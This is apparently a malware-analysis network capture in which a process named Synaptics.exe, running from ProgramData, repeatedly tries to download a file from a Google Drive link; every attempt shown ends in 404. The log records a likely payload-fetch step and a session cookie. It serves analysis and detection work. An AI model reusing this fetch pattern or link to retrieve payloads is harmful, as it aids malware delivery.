                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        75 | 192.168.2.7 | 50087 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:28 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:28 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-usaXxj7j3ESyqd1wMkPt_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.7 | 50088 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:29 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4WOSPWpM7pzX4ZiD-mZe-mvakOBU98m260O6fpv8xExiqp48-Yxc63hoqZnbVEZkzd
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tvbMUvniZ0jel4GCV24lRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:29 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:29 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="m4D8z7Vy7RDqlbK1B6sJWg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:29 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.7 | 50086 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:28 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cDX9LlzIOiA7V7uMEmp8iA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.7 | 50089 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:29 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6ps02OvxWtNMMAe_BEi2q9G3wM9ThvNxUEqVFhm83fiFu-W0kBcPjdWKnJpZdRq44h
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_XcyCMOs4X9GLi9bHjGAzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:29 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:29 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Csyedxe-89PSGbtWvij8QQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:29 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.7 | 50095 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:29 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:30 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:29 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TYd1ykXuaOzq8GOub62kjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        80 | 192.168.2.7 | 50096 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:29 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        81 | 192.168.2.7 | 50097 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:29 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        82 | 192.168.2.7 | 50098 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:29 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        83 | 192.168.2.7 | 50101 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:30 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-zv7UOmRRyDA2Ih3IuGjZTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        84 | 192.168.2.7 | 50102 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:30 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:31 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ee5YKY3ek8bWEuB1h41vLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        85 | 192.168.2.7 | 50103 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:30 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:31 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4MK3E-AwcJulIXQ0UZgkN809tKNDavKOseqoznTaoV_kn5cuKzsLmzS7f5khnxrfxA
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:30 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Kyof0GHRxxHTaM6xEMabOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:31 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:31 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="9ZPL5uSIdH-cpkQbhWUxZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:31 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        86 | 192.168.2.7 | 50106 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:31 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
